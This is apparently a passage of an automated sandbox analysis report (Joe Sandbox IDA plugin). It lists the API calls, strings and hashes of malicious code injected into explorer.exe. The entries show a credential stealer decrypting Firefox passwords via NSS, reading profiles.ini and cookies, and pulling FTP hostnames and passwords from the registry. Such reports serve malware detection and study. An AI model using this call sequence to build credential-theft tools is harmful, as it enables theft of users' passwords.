                                                                                                                                                    • Instruction ID: df1cfb17c20027da2512d45c5128a6778b27486643864281f7570c020e49a392
                                                                                                                                                    • Opcode Fuzzy Hash: a45632201d6c041be8ebe640bc76409ca1d1f5511963bd29dfba0108310254ce
                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0907220431E7BE210DF56EC81FA7BBADDF91794F25002EB601C2181DEA2ED4982B4
                                                                                                                                                    APIs
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00121FFA
                                                                                                                                                    • RtlMoveMemory.NTDLL(?,?,?), ref: 00122015
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2807545630-0
                                                                                                                                                    • Opcode ID: 23c7016d83ed52c6cb53537a13e49d3e37d285f1d2e4a77bce4ca4640899c37a
                                                                                                                                                    • Instruction ID: 8b08b62f7d690337643d6fc810d042d07842bbabf924f76247a06c24e639e268
                                                                                                                                                    • Opcode Fuzzy Hash: 23c7016d83ed52c6cb53537a13e49d3e37d285f1d2e4a77bce4ca4640899c37a
                                                                                                                                                    • Instruction Fuzzy Hash: E401E8B1A01229BB9B25DF9AEC84DAFBBBCEF55750B10016AF905D3200D7719E50CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 001211B2
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 001211D2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3825993179-0
                                                                                                                                                    • Opcode ID: d6ab0d86803d3bca08f9b7cb1f3028cef1e469ed9e85ef839e147a79e0496014
                                                                                                                                                    • Instruction ID: db0869d64c7e5902d5dc5a752b41db6e752a0353459fcd34698d0887d6e0f29f
                                                                                                                                                    • Opcode Fuzzy Hash: d6ab0d86803d3bca08f9b7cb1f3028cef1e469ed9e85ef839e147a79e0496014
                                                                                                                                                    • Instruction Fuzzy Hash: 2CF0A7326001287BD720D6A7DC84DEBFB7DDF95BA1B100169F90DD3140DA729D5483A0
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _alldiv_allmul
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 727729158-0
                                                                                                                                                    • Opcode ID: 4183637bc278ea4f491d7acdbcb6adbc9c437366901cd1489e751b6a55fb4a1e
                                                                                                                                                    • Instruction ID: 3338feab9980b8bd6631664f5577b87ad94b12580fa83d9d86c3fbcffee5537a
                                                                                                                                                    • Opcode Fuzzy Hash: 4183637bc278ea4f491d7acdbcb6adbc9c437366901cd1489e751b6a55fb4a1e
                                                                                                                                                    • Instruction Fuzzy Hash: 22D17371A087119BC725DF25C4D1A2EB7E2BFD8754F048A2DF9959B251EB30EC41CB81
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b9b8042e8d47b14f16f02b4684d627243deb5e2a14b86f841b67c000a8fde787
                                                                                                                                                    • Instruction ID: 09bd408ee8c3ac56138ed12d63c849861e62a359ec2b151373e7fe0615f073eb
                                                                                                                                                    • Opcode Fuzzy Hash: b9b8042e8d47b14f16f02b4684d627243deb5e2a14b86f841b67c000a8fde787
                                                                                                                                                    • Instruction Fuzzy Hash: 02C1C16391A6A24FDB158D3894413B9BB93EBB2300F1CC96DD4E58B7C3D728D916C351
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                    • Opcode ID: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                                                                                                                                                    • Instruction ID: 8f38b5c35dbe94d8a95eb34b48ab35e1f206d1a33e7dd18de0b0f14ee152ae3f
                                                                                                                                                    • Opcode Fuzzy Hash: 42cac66ebe1ff15dbe57e0d02516e2c732b3a03d5a38bc36668124b3a0d2d49c
                                                                                                                                                    • Instruction Fuzzy Hash: 4C51E3726083248BC314EE28E89167FB2D6ABD8304F14892DFAD687292DB74D82587C1
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                      • Part of subcall function 00121090: lstrlenW.KERNEL32(?,?,00000000,001217E5), ref: 00121097
                                                                                                                                                      • Part of subcall function 00121090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 001210A8
                                                                                                                                                      • Part of subcall function 001219B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00122CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 001219C4
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00122503
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0012250A
                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00122563
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00122570
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00122591
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0012259E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 001225AB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 001225B8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 001225C5
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 001225D2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 001225DF
                                                                                                                                                      • Part of subcall function 0012190B: lstrlen.KERNEL32(?,?,?,?,00000000,00122783), ref: 0012192B
                                                                                                                                                      • Part of subcall function 0012190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00122783), ref: 00121930
                                                                                                                                                      • Part of subcall function 0012190B: lstrcat.KERNEL32(00000000,?), ref: 00121946
                                                                                                                                                      • Part of subcall function 0012190B: lstrcat.KERNEL32(00000000,00000000), ref: 0012194A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                                    • API String ID: 3366569387-3272982511
                                                                                                                                                    • Opcode ID: 6c10c3e5c279f44bfe6b2eaf32437dd6b6054ba5eee2ae7aedeb5de4e7bc684f
                                                                                                                                                    • Instruction ID: 7539d52274514ee8c9b95be1fcd8464e89928e546d1e125ab62417948d986c6e
                                                                                                                                                    • Opcode Fuzzy Hash: 6c10c3e5c279f44bfe6b2eaf32437dd6b6054ba5eee2ae7aedeb5de4e7bc684f
                                                                                                                                                    • Instruction Fuzzy Hash: C6414332A00771BBCB28AF357C5446E3AFADBA1780700442EF945D3261DB348D9ACB51
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00125BF5: memset.NTDLL ref: 00125C07
                                                                                                                                                    • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 001260E1
                                                                                                                                                    • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 001260EC
                                                                                                                                                    • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00126113
                                                                                                                                                    • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0012618E
                                                                                                                                                    • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 001261B5
                                                                                                                                                    • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 001261C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _alldiv$_allrem$memset
                                                                                                                                                    • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                                    • API String ID: 2557048445-1989508764
                                                                                                                                                    • Opcode ID: 06ada9a02c813c48ccd23528b0a7158743580893cdeb6ff44e9d4b13baf89fdc
                                                                                                                                                    • Instruction ID: c62755b8bfcff026b84e385b67c7a39c159ecdefbef7cffa146d69b359c13a55
                                                                                                                                                    • Opcode Fuzzy Hash: 06ada9a02c813c48ccd23528b0a7158743580893cdeb6ff44e9d4b13baf89fdc
                                                                                                                                                    • Instruction Fuzzy Hash: 3EB19BB29087A2ABD3269F24ECC4B3B7BD5FB90344F250559F886A61D1EB30CD308695
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcmp
                                                                                                                                                    • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                    • API String ID: 1475443563-3683840195
                                                                                                                                                    • Opcode ID: 61af15e1ad566248ba1180a779808626c7ec282138d0614c20849a323f534c32
                                                                                                                                                    • Instruction ID: 8632717df248a1a0b648cc70f259db85c1f3bd948e04fc9cceb196e2f86582e1
                                                                                                                                                    • Opcode Fuzzy Hash: 61af15e1ad566248ba1180a779808626c7ec282138d0614c20849a323f534c32
                                                                                                                                                    • Instruction Fuzzy Hash: 16512071A48310ABC724DF64FC45A6BB7B5BF55300F158869F89A9B281E770EC18CB92
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00122AD2
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 001229E1
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 001229EC
                                                                                                                                                    • wsprintfA.USER32 ref: 00122A38
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00122A44
                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00122A6C
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00122A99
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                                    • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                                    • API String ID: 304071051-2605711689
                                                                                                                                                    • Opcode ID: 1db2757d74e91fd2e8403cce6ed8245151491a2bef0086bdbb7a3d64187d7425
                                                                                                                                                    • Instruction ID: 85a9ef194a465d2a96ab562f5778d83cd15336d5139e919ecd60d940cfe5d2d1
                                                                                                                                                    • Opcode Fuzzy Hash: 1db2757d74e91fd2e8403cce6ed8245151491a2bef0086bdbb7a3d64187d7425
                                                                                                                                                    • Instruction Fuzzy Hash: B451B330604366AFCB25EF31A850A3F77EAAFE5304F04482DF48597652DB35DC998B52
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                      • Part of subcall function 00121B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121B82
                                                                                                                                                      • Part of subcall function 00121B6A: CloseHandle.KERNEL32(00000000), ref: 00121B8F
                                                                                                                                                    • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00122D13
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,Profile), ref: 00122D45
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,Path,0017637C,?,00000FFF,?), ref: 00122D68
                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00122D7B
                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 00122DD8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                                    • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                                    • API String ID: 2234428054-4107377610
                                                                                                                                                    • Opcode ID: 5a27861b54688c708c73e488e72532540fb3d2403a280916536eddc20ec54fad
                                                                                                                                                    • Instruction ID: bacbe14690fa27301025af61e512d2b1eb5c339ed7cd560eaf1d2fca61c18ec4
                                                                                                                                                    • Opcode Fuzzy Hash: 5a27861b54688c708c73e488e72532540fb3d2403a280916536eddc20ec54fad
                                                                                                                                                    • Instruction Fuzzy Hash: 7331B130704326ABCB24EF70B811A3F76A2AFE4700F10442DF949A7692DB758CA6D752
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 001219E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A1E
                                                                                                                                                      • Part of subcall function 001219E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A3C
                                                                                                                                                      • Part of subcall function 001219E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A75
                                                                                                                                                      • Part of subcall function 001219E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A98
                                                                                                                                                      • Part of subcall function 0012482C: lstrlenW.KERNEL32(?), ref: 00124845
                                                                                                                                                      • Part of subcall function 0012482C: lstrlenW.KERNEL32(?), ref: 0012488F
                                                                                                                                                      • Part of subcall function 0012482C: lstrlenW.KERNEL32(?), ref: 00124897
                                                                                                                                                    • wsprintfW.USER32 ref: 001249A7
                                                                                                                                                    • wsprintfW.USER32 ref: 001249B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                                    • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                                    • API String ID: 2889301010-4273187114
                                                                                                                                                    • Opcode ID: 1e0e429cca041ae7d39ea019ce096c9e21f5639ddc9cd7832d97f5556d6fdfaa
                                                                                                                                                    • Instruction ID: 27d408907e3a70cd775294eb965491f281145271738273a71b9dcf851d17b58b
                                                                                                                                                    • Opcode Fuzzy Hash: 1e0e429cca041ae7d39ea019ce096c9e21f5639ddc9cd7832d97f5556d6fdfaa
                                                                                                                                                    • Instruction Fuzzy Hash: AE310621B043246BCB20EF65EC5582BB6EDEFDD74CB05491EF04497241DBB2DC9187A1
                                                                                                                                                    APIs
                                                                                                                                                    • memcpy.NTDLL(?,?,?,?,00000000), ref: 0012FB32
                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0012FB4D
                                                                                                                                                    • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0012FB60
                                                                                                                                                    • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0012FB95
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                    • API String ID: 3510742995-3408036318
                                                                                                                                                    • Opcode ID: 784927af5be9d34872f478469b8a5fe095b5c21c4a35b1f7cee613abc50b2472
                                                                                                                                                    • Instruction ID: a1218caf5f86c60eb729b96f319c69a07f2f872a34410e850359ac339be19994
                                                                                                                                                    • Opcode Fuzzy Hash: 784927af5be9d34872f478469b8a5fe095b5c21c4a35b1f7cee613abc50b2472
                                                                                                                                                    • Instruction Fuzzy Hash: 51D1C2B16083518FCB14DF28D881B1ABBF1AFA5314F08457DF8998B392EB74D815CB62
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %$-x0$NaN
                                                                                                                                                    • API String ID: 0-62881354
                                                                                                                                                    • Opcode ID: 92a6ec6b7c8ba852b1de56b9890e4488b2cfea0a9683dfc8f80b92223465d2b2
                                                                                                                                                    • Instruction ID: 9495df483480bab6577ecb7ef1e1a34f87abc06ec70ac3d2356e7d8bb5f74156
                                                                                                                                                    • Opcode Fuzzy Hash: 92a6ec6b7c8ba852b1de56b9890e4488b2cfea0a9683dfc8f80b92223465d2b2
                                                                                                                                                    • Instruction Fuzzy Hash: F0D1E53050C3B28BD729CB28A5A073BBBE1AF9A304F29485DF8C1973D1D764C965D792
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: -x0$NaN
                                                                                                                                                    • API String ID: 0-3447725786
                                                                                                                                                    • Opcode ID: 73cd54fe8dbc321f59e46039c73227a03f3ebfe0e60b0703c909c3ab1fb10853
                                                                                                                                                    • Instruction ID: 587b188bb30d5262b91381645d32bc7c360c7089c56f457d914e8a453ad32dae
                                                                                                                                                    • Opcode Fuzzy Hash: 73cd54fe8dbc321f59e46039c73227a03f3ebfe0e60b0703c909c3ab1fb10853
                                                                                                                                                    • Instruction Fuzzy Hash: 61E1E33060C3B28BD729CB28A45073BBBE1AF96304F29495DF8C5973D1D760C965D792
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: -x0$NaN
                                                                                                                                                    • API String ID: 0-3447725786
                                                                                                                                                    • Opcode ID: 99b77e5e8eaf87da7b02f28c5b77d92605e964fe3f474cfc07af221acccc6316
                                                                                                                                                    • Instruction ID: 209d9bfea1af44981053bb757d84816d7e3c78f1f972b57ba887d1ba2bed40b2
                                                                                                                                                    • Opcode Fuzzy Hash: 99b77e5e8eaf87da7b02f28c5b77d92605e964fe3f474cfc07af221acccc6316
                                                                                                                                                    • Instruction Fuzzy Hash: 87E1D33060C3A28BD729CF28A5A072BBBE1AF9A304F25485DF8C5973D1D760CD65C792
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: -x0$NaN
                                                                                                                                                    • API String ID: 0-3447725786
                                                                                                                                                    • Opcode ID: fcafd34fa92956c691ff1826794ee738a1f8b944de5d4ebafd46d642280e48af
                                                                                                                                                    • Instruction ID: 688995178d03777db442b1f3b90028344770eb616a639f6132ac696e32173f73
                                                                                                                                                    • Opcode Fuzzy Hash: fcafd34fa92956c691ff1826794ee738a1f8b944de5d4ebafd46d642280e48af
                                                                                                                                                    • Instruction Fuzzy Hash: 40E1E43060C3A28BD729CF28A5A072BBBE1AF96304F29495DF8C5973D1D770C965C792
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: -x0$NaN
                                                                                                                                                    • API String ID: 0-3447725786
                                                                                                                                                    • Opcode ID: b29f5273243fce15d847ed7457b370092325508b344f918edc8f99d2228b127c
                                                                                                                                                    • Instruction ID: 58e4e27d7a71f9a0669cb17697e57536c654b48ec86857921eaab93ee16ec70b
                                                                                                                                                    • Opcode Fuzzy Hash: b29f5273243fce15d847ed7457b370092325508b344f918edc8f99d2228b127c
                                                                                                                                                    • Instruction Fuzzy Hash: 9BE1E37060C3A28BD729CF28A5A072BBBE1AF9A304F29485DF8C1973D1D760C965C752
                                                                                                                                                    APIs
                                                                                                                                                    • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0012720E
                                                                                                                                                    • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00127226
                                                                                                                                                    • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0012727B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _aulldvrm$_aullrem
                                                                                                                                                    • String ID: -x0$NaN
                                                                                                                                                    • API String ID: 105165338-3447725786
                                                                                                                                                    • Opcode ID: de80a5f1ebaf48dee2a5b4f8fc25fe1415380cd200807368864776874f2a3698
                                                                                                                                                    • Instruction ID: 9200b1a12ef62aa084e3603122d1594a02ca9c389aa19fa7dad1f1f5911220d6
                                                                                                                                                    • Opcode Fuzzy Hash: de80a5f1ebaf48dee2a5b4f8fc25fe1415380cd200807368864776874f2a3698
                                                                                                                                                    • Instruction Fuzzy Hash: 6BD1E53060C3B28BD729CB28A5A073BBBE1AF96304F29485DF8C1973D1D764C965D792
                                                                                                                                                    APIs
                                                                                                                                                    • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00128AAD
                                                                                                                                                    • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00128B66
                                                                                                                                                    • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00128C9B
                                                                                                                                                    • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00128CAE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _allmul$_alldvrm
                                                                                                                                                    • String ID: .
                                                                                                                                                    • API String ID: 115548886-248832578
                                                                                                                                                    • Opcode ID: 0eafb817204e4b8525b6a155ec45cf20ac74a72b00414648a91dc98e10dec574
                                                                                                                                                    • Instruction ID: a16741d6b79903ed19d8fcdd3101bc9d76e7a30e48864a09747210c4c13de43d
                                                                                                                                                    • Opcode Fuzzy Hash: 0eafb817204e4b8525b6a155ec45cf20ac74a72b00414648a91dc98e10dec574
                                                                                                                                                    • Instruction Fuzzy Hash: A2D136B190E7A98BC714DF48A48027EBBF0BBE5310F044D5EF5C996281EFB0C9658786
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: ,$7$9
                                                                                                                                                    • API String ID: 2221118986-1653249994
                                                                                                                                                    • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
